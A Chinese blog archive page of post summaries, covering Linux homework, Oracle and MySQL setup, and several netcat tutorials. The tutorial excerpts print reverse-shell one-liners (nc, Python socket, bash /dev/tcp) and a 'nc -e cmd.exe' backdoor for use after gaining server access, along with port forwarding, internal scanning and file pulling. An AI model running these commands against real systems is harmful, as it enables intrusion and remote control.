03 2020 档案
摘要:网易云课堂 Linux作业 目录 m1-第二次考试 (2019-03-14 16:16) 编辑 m1-第4周作业 (2019-03-14 16:10) 编辑 m2-第5周作业 (2019-03-14 16:00) 编辑 m3-第6周作业 (2019-03-14 15:51) 编辑 m3-第三次考试
阅读全文
摘要:创建文件 D:\app\instantclient_11_2\network\admin\tnsnames.ora ORCL = (DESCRIPTION = (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.1.17)(PORT
阅读全文
摘要:CentOS7 重置 MySQL 8.0 密码 上一篇文章我们已经讲完了 MySQL 的安装,本篇接下来将一下如何重置密码。 1.查看自动生成的密码 安装完成后 MySQL会给我们自动生成一个随机密码 查看命令如下: grep 'temporary password' /var/log/mysqld
阅读全文
摘要:Oracle 12C安装教程 Oracle 12c,全称Oracle Database 12c,是Oracle 11g的升级版,新增了很多新的特性。本章节就为大家介绍Oracle 12c的下载和安装步骤。 Oracle 12c下载 打开Oracle的官方中文网站,选择相应的版本即可。 下载地址:ht
阅读全文
摘要:应用场景某些拿到服务器权限之后,想要设置一个反弹shell。当时因为配置原因不支持-e参数基础介绍反弹shell命令: nc ip port | /bin/bash | nc ip portPC接收Netcat命令: nc -lvnp port 需要启动两个监听端口命令解释介绍在攻击测试机器上开启两个NC进行监听端,其中一个作为输入,一个作为输出。目标机器上 使用管道来重新定向输入和输出。
阅读全文
摘要:应用场景某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。但是安装了Python。基础介绍反弹shell命令: python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s....
阅读全文
摘要:应用场景某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。反弹shell命令: bash -i >& /dev/tcp/ip/port 0>&1PC接收Netcat命令: nc -lvp port命令解释介绍bash -i >& /dev/tcp/ip/port 0>&1在命令中bash -i 表示已交互模式运行bash shell。重定向符 >& ,如果...
阅读全文
摘要:连接转发为什么需要连接转发?突破某些特殊情况下的连接限制,以及处理一些特殊情况。- echo nc [target] [port] > delay.bat- nc -l -p [localport] -e delay.bat当有客户端连接该服务端时,连接的客户端和通过服务端连接到 target port上 实现了连接转发功能。(端口转发)内网机器跳板机器端口转发目标机器通话
阅读全文
摘要:命令参数 [root@bzhl ~]# nc -hNcat 7.50 ( https://nmap.org/ncat )Usage: ncat [options] [hostname] [port]Options taking a time assume seconds. Append 'ms' for milliseconds,'s' for seconds, 'm' for minutes, ...
阅读全文
摘要:使用场景1、获取目标的命令执行权限当目标机器上存在netcat之后,可以使用netcat建立后门,来实现执行目标命令的功能。为什么可以使用netcat建立后门,并返回操作结果?原理:netcat一切数据时通过标准输入/输出流实现的,所以可以利用netcat的命令行进行后门建立,并传输结果信息。window建立后门使用方法监听型后门:- nc -l -p 4444 -e cmd.exe 连接型后门-...
阅读全文
摘要:使用场景1、目标内网的扫描当获得目标权限之后,如果目标没有任何途径可以对内网进行探测,但此时刚好具有一个netcat的话,就可以使用netcat进行内网ip和端口的扫描。2、单纯对某个目标进行端口探测当手头没有任何探测工具可以使用netcat进行端口探测。3、对目标的服务banner进行抓取通过netcat对目标端口进行探测。端口扫描使用方法使用命令行:nc -v -n -z -w1 [targ...
阅读全文
摘要:使用场景1、 取证当目标机器被黑客攻击之后,取证人员可以利用nc的文件传输功能来获取目标机器上的文件内容。避免直接在目标机器上进行操作造成取证的误差。2、 单纯获取目标机器敏感文件当目标机器上有一些文件内容,无法正常下载时,可以利用nc进行文件传输。为什么可以直接利用nc进行文件传输呢?nc中的数据传输 使用的是标准的输入、输出流,所以可以直接利用命令行来进行操作。文件传输使用方法如果此时服务端并...
阅读全文
摘要:在网络工具中有“瑞士军刀”美誉的NetCat, 在我们用了N年了至今仍是爱不释手。这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。下载地址:https://eternallybored.org/misc/netcat/使用场景基础使用方法服务端客户端返回shell的使用
阅读全文
摘要:设置数据库密码 mysqladmin -uroot password wyl606 备份需要转移的数据库文件 mysqldump -uroot -p123456 wordpress -B |gzip>bak.sql.gz 拷贝到db-01数据库 scp -P 27755 root@162.219.1
阅读全文
浙公网安备 33010602011771号